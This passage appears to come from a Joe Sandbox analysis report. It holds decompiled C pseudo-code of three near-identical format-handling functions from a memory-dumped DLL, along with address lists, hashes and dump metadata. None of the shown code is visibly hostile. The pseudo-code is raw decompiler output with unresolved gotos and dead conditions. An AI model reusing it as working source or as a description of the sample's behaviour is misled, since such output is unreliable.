                                                                      0x18001da09
                                                                      0x18001da0d
                                                                      0x18001da18
                                                                      0x18001da1d
                                                                      0x18001da23
                                                                      0x18001da2a
                                                                      0x18001da36
                                                                      0x18001da48
                                                                      0x18001da4a
                                                                      0x18001da4f
                                                                      0x18001da51
                                                                      0x18001da56
                                                                      0x18001da58
                                                                      0x18001da5f
                                                                      0x18001da68
                                                                      0x18001da71
                                                                      0x18001da7c
                                                                      0x18001da85
                                                                      0x18001da8a
                                                                      0x18001da8c
                                                                      0x18001da8f
                                                                      0x18001da92
                                                                      0x18001da99
                                                                      0x18001da9b
                                                                      0x18001daa2
                                                                      0x18001daaf
                                                                      0x18001dab6
                                                                      0x18001dabe
                                                                      0x18001dac0
                                                                      0x18001dac4
                                                                      0x18001dac8
                                                                      0x18001dad1
                                                                      0x18001dad6
                                                                      0x18001dadb
                                                                      0x18001dadf
                                                                      0x18001daec
                                                                      0x18001daf7
                                                                      0x18001db00
                                                                      0x18001db02
                                                                      0x18001db0b
                                                                      0x18001db0e
                                                                      0x18001db2b

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 679a88ab2e29fe6b84b2505bcb1b80f08a0660bc4e553ca7af34ae798022eab0
                                                                      • Instruction ID: a0bc4f407f59e146a8b101cdbacf0fd2629498361df7f51c601f55d828e6e7fb
                                                                      • Opcode Fuzzy Hash: 679a88ab2e29fe6b84b2505bcb1b80f08a0660bc4e553ca7af34ae798022eab0
                                                                      • Instruction Fuzzy Hash: F3519372114E4C82EBA7DF29D0543EC27A0EB4DBDCF558216FA4A0B6D9CF25CA4AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001DF04(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_t162 = __r10;
                                                                      				_t160 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001dfe3;
                                                                      				if (_t110 == 0) goto 0x8001df5d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001e037;
                                                                      				if (_t111 == 0) goto 0x8001dfb3;
                                                                      				if (_t111 == 0) goto 0x8001df84;
                                                                      				if (_t111 == 0) goto 0x8001e037;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001e003;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e060;
                                                                      				E00000001180019AD0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e065;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001dfa9;
                                                                      				_t70 = E00000001180017474( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e065;
                                                                      				E00000001180017B18(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001e065;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001dfd9;
                                                                      				_t74 = E00000001180016B8C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e065;
                                                                      				E00000001180017000(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001e065;
                                                                      				if (_t115 == 0) goto 0x8001df5d;
                                                                      				if (_t115 == 0) goto 0x8001df5d;
                                                                      				if (_t115 == 0) goto 0x8001df5d;
                                                                      				goto 0x8001df4b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001e11b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001e059;
                                                                      				_t80 = E00000001180017F88( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001e065;
                                                                      				_t81 = E000000011800183F0(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001e065;
                                                                      				E00000001180019F40(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001e030;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001e07f;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001e119;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001e09d;
                                                                      				if (_t153 >= 0) goto 0x8001e09d;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001e0ac;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001e0c3;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E000000011800167C4(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001e0cc;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001e0e5;
                                                                      				E00000001180021DC0(_t132, _t154);
                                                                      				goto 0x8001e0ec;
                                                                      				E00000001180020810(__esi, _t132, _t154, _t162);
                                                                      				if (0 == 0) goto 0x8001e119;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001e10a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001e119;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001df04
                                                                      0x18001df04
                                                                      0x18001df04
                                                                      0x18001df09
                                                                      0x18001df0e
                                                                      0x18001df1f
                                                                      0x18001df22
                                                                      0x18001df25
                                                                      0x18001df28
                                                                      0x18001df2e
                                                                      0x18001df31
                                                                      0x18001df37
                                                                      0x18001df39
                                                                      0x18001df3b
                                                                      0x18001df44
                                                                      0x18001df49
                                                                      0x18001df4e
                                                                      0x18001df57
                                                                      0x18001df64
                                                                      0x18001df74
                                                                      0x18001df7a
                                                                      0x18001df7f
                                                                      0x18001df8b
                                                                      0x18001df9d
                                                                      0x18001df9f
                                                                      0x18001dfa4
                                                                      0x18001dfa9
                                                                      0x18001dfae
                                                                      0x18001dfba
                                                                      0x18001dfca
                                                                      0x18001dfcd
                                                                      0x18001dfcf
                                                                      0x18001dfd4
                                                                      0x18001dfd9
                                                                      0x18001dfde
                                                                      0x18001dfe6
                                                                      0x18001dfef
                                                                      0x18001dff8
                                                                      0x18001dffe
                                                                      0x18001e003
                                                                      0x18001e007
                                                                      0x18001e00a
                                                                      0x18001e011
                                                                      0x18001e015
                                                                      0x18001e020
                                                                      0x18001e025
                                                                      0x18001e02b
                                                                      0x18001e032
                                                                      0x18001e03e
                                                                      0x18001e050
                                                                      0x18001e052
                                                                      0x18001e057
                                                                      0x18001e059
                                                                      0x18001e05e
                                                                      0x18001e060
                                                                      0x18001e067
                                                                      0x18001e070
                                                                      0x18001e079
                                                                      0x18001e084
                                                                      0x18001e08d
                                                                      0x18001e092
                                                                      0x18001e094
                                                                      0x18001e097
                                                                      0x18001e09a
                                                                      0x18001e0a1
                                                                      0x18001e0a3
                                                                      0x18001e0aa
                                                                      0x18001e0b7
                                                                      0x18001e0be
                                                                      0x18001e0c6
                                                                      0x18001e0c8
                                                                      0x18001e0cc
                                                                      0x18001e0d0
                                                                      0x18001e0d9
                                                                      0x18001e0de
                                                                      0x18001e0e3
                                                                      0x18001e0e7
                                                                      0x18001e0f4
                                                                      0x18001e0ff
                                                                      0x18001e108
                                                                      0x18001e10a
                                                                      0x18001e113
                                                                      0x18001e116
                                                                      0x18001e133

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22ef702ec0d34c370f8a5f86ab57a26bdf4f7b591f056810386786dcd73a481a
                                                                      • Instruction ID: 367246c72ed7ec6a9e0e4ebf027759afc358acd64beb37f583a99da03e17272c
                                                                      • Opcode Fuzzy Hash: 22ef702ec0d34c370f8a5f86ab57a26bdf4f7b591f056810386786dcd73a481a
                                                                      • Instruction Fuzzy Hash: 32519732110E8C86E7A79F28C4543ED27A0E74EBDCF15821AFA4A076D9CF75C68AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001E508(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001e5e7;
                                                                      				if (_t109 == 0) goto 0x8001e561;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001e63b;
                                                                      				if (_t110 == 0) goto 0x8001e5b7;
                                                                      				if (_t110 == 0) goto 0x8001e588;
                                                                      				if (_t110 == 0) goto 0x8001e63b;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001e607;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e664;
                                                                      				E000000011800197B8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e669;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e5ad;
                                                                      				_t70 = E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e669;
                                                                      				E00000001180017800(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001e669;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001e5dd;
                                                                      				_t74 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001e669;
                                                                      				E00000001180016CE8(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001e669;
                                                                      				if (_t114 == 0) goto 0x8001e561;
                                                                      				if (_t114 == 0) goto 0x8001e561;
                                                                      				if (_t114 == 0) goto 0x8001e561;
                                                                      				goto 0x8001e54f;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001e719;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001e65d;
                                                                      				_t80 = E00000001180017C70( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001e669;
                                                                      				_t81 = E000000011800180E0(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001e669;
                                                                      				E00000001180019C28(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001e634;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001e683;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001e717;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001e6a1;
                                                                      				if (_t152 >= 0) goto 0x8001e6a1;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001e6b0;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001e6c7;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001671C(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001e6d0;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001e6e9;
                                                                      				E00000001180021FCC(_t131, _t153);
                                                                      				goto 0x8001e6f0;
                                                                      				E00000001180020A0C(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001e717;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001e709;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001e717;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001e508
                                                                      0x18001e508
                                                                      0x18001e50d
                                                                      0x18001e512
                                                                      0x18001e523
                                                                      0x18001e526
                                                                      0x18001e529
                                                                      0x18001e52c
                                                                      0x18001e532
                                                                      0x18001e535
                                                                      0x18001e53b
                                                                      0x18001e53d
                                                                      0x18001e53f
                                                                      0x18001e548
                                                                      0x18001e54d
                                                                      0x18001e552
                                                                      0x18001e55b
                                                                      0x18001e568
                                                                      0x18001e578
                                                                      0x18001e57e
                                                                      0x18001e583
                                                                      0x18001e58f
                                                                      0x18001e5a1
                                                                      0x18001e5a3
                                                                      0x18001e5a8
                                                                      0x18001e5ad
                                                                      0x18001e5b2
                                                                      0x18001e5be
                                                                      0x18001e5ce
                                                                      0x18001e5d1
                                                                      0x18001e5d3
                                                                      0x18001e5d8
                                                                      0x18001e5dd
                                                                      0x18001e5e2
                                                                      0x18001e5ea
                                                                      0x18001e5f3
                                                                      0x18001e5fc
                                                                      0x18001e602
                                                                      0x18001e607
                                                                      0x18001e60b
                                                                      0x18001e60e
                                                                      0x18001e615
                                                                      0x18001e619
                                                                      0x18001e624
                                                                      0x18001e629
                                                                      0x18001e62f
                                                                      0x18001e636
                                                                      0x18001e642
                                                                      0x18001e654
                                                                      0x18001e656
                                                                      0x18001e65b
                                                                      0x18001e65d
                                                                      0x18001e662
                                                                      0x18001e664
                                                                      0x18001e66b
                                                                      0x18001e674
                                                                      0x18001e67d
                                                                      0x18001e688
                                                                      0x18001e691
                                                                      0x18001e696
                                                                      0x18001e698
                                                                      0x18001e69b
                                                                      0x18001e69e
                                                                      0x18001e6a5
                                                                      0x18001e6a7
                                                                      0x18001e6ae
                                                                      0x18001e6bb
                                                                      0x18001e6c2
                                                                      0x18001e6ca
                                                                      0x18001e6cc
                                                                      0x18001e6d0
                                                                      0x18001e6d4
                                                                      0x18001e6dd
                                                                      0x18001e6e2
                                                                      0x18001e6e7
                                                                      0x18001e6eb
                                                                      0x18001e6f8
                                                                      0x18001e6fe
                                                                      0x18001e707
                                                                      0x18001e709
                                                                      0x18001e711
                                                                      0x18001e714
                                                                      0x18001e731

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f053bf7a21944a540571db01deba52d96da1462f95019be173282ba9bd20ca2
                                                                      • Instruction ID: cdc9fb6877293899410da448a2a1a35827fc722a544a5572b59d1a17120d9582
                                                                      • Opcode Fuzzy Hash: 7f053bf7a21944a540571db01deba52d96da1462f95019be173282ba9bd20ca2
                                                                      • Instruction Fuzzy Hash: 3151A072114E8886F7A78F2880147ED27A1E75EBDCF598216FA490B6D9CF25CA49C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001EB04(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001ebe3;
                                                                      				if (_t109 == 0) goto 0x8001eb5d;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001ec37;
                                                                      				if (_t110 == 0) goto 0x8001ebb3;
                                                                      				if (_t110 == 0) goto 0x8001eb84;
                                                                      				if (_t110 == 0) goto 0x8001ec37;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001ec03;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ec60;
                                                                      				E000000011800198C0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ec65;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001eba9;
                                                                      				_t70 = E00000001180017260( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ec65;
                                                                      				E00000001180017908(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ec65;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001ebd9;
                                                                      				_t74 = E00000001180016978( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ec65;
                                                                      				E00000001180016DF0(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ec65;
                                                                      				if (_t114 == 0) goto 0x8001eb5d;
                                                                      				if (_t114 == 0) goto 0x8001eb5d;
                                                                      				if (_t114 == 0) goto 0x8001eb5d;
                                                                      				goto 0x8001eb4b;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001ed15;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001ec59;
                                                                      				_t80 = E00000001180017D78( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001ec65;
                                                                      				_t81 = E000000011800181E4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001ec65;
                                                                      				E00000001180019D30(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001ec30;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001ec7f;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001ed13;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001ec9d;
                                                                      				if (_t152 >= 0) goto 0x8001ec9d;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001ecac;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001ecc3;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001671C(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001eccc;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001ece5;
                                                                      				E00000001180022170(_t131, _t153);
                                                                      				goto 0x8001ecec;
                                                                      				E00000001180020BB0(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001ed13;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001ed05;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001ed13;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001eb04
                                                                      0x18001eb04
                                                                      0x18001eb09
                                                                      0x18001eb0e
                                                                      0x18001eb1f
                                                                      0x18001eb22
                                                                      0x18001eb25
                                                                      0x18001eb28
                                                                      0x18001eb2e
                                                                      0x18001eb31
                                                                      0x18001eb37
                                                                      0x18001eb39
                                                                      0x18001eb3b
                                                                      0x18001eb44
                                                                      0x18001eb49
                                                                      0x18001eb4e
                                                                      0x18001eb57
                                                                      0x18001eb64
                                                                      0x18001eb74
                                                                      0x18001eb7a
                                                                      0x18001eb7f
                                                                      0x18001eb8b
                                                                      0x18001eb9d
                                                                      0x18001eb9f
                                                                      0x18001eba4
                                                                      0x18001eba9
                                                                      0x18001ebae
                                                                      0x18001ebba
                                                                      0x18001ebca
                                                                      0x18001ebcd
                                                                      0x18001ebcf
                                                                      0x18001ebd4
                                                                      0x18001ebd9
                                                                      0x18001ebde
                                                                      0x18001ebe6
                                                                      0x18001ebef
                                                                      0x18001ebf8
                                                                      0x18001ebfe
                                                                      0x18001ec03
                                                                      0x18001ec07
                                                                      0x18001ec0a
                                                                      0x18001ec11
                                                                      0x18001ec15
                                                                      0x18001ec20
                                                                      0x18001ec25
                                                                      0x18001ec2b
                                                                      0x18001ec32
                                                                      0x18001ec3e
                                                                      0x18001ec50
                                                                      0x18001ec52
                                                                      0x18001ec57
                                                                      0x18001ec59
                                                                      0x18001ec5e
                                                                      0x18001ec60
                                                                      0x18001ec67
                                                                      0x18001ec70
                                                                      0x18001ec79
                                                                      0x18001ec84
                                                                      0x18001ec8d
                                                                      0x18001ec92
                                                                      0x18001ec94
                                                                      0x18001ec97
                                                                      0x18001ec9a
                                                                      0x18001eca1
                                                                      0x18001eca3
                                                                      0x18001ecaa
                                                                      0x18001ecb7
                                                                      0x18001ecbe
                                                                      0x18001ecc6
                                                                      0x18001ecc8
                                                                      0x18001eccc
                                                                      0x18001ecd0
                                                                      0x18001ecd9
                                                                      0x18001ecde
                                                                      0x18001ece3
                                                                      0x18001ece7
                                                                      0x18001ecf4
                                                                      0x18001ecfa
                                                                      0x18001ed03
                                                                      0x18001ed05
                                                                      0x18001ed0d
                                                                      0x18001ed10
                                                                      0x18001ed2d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
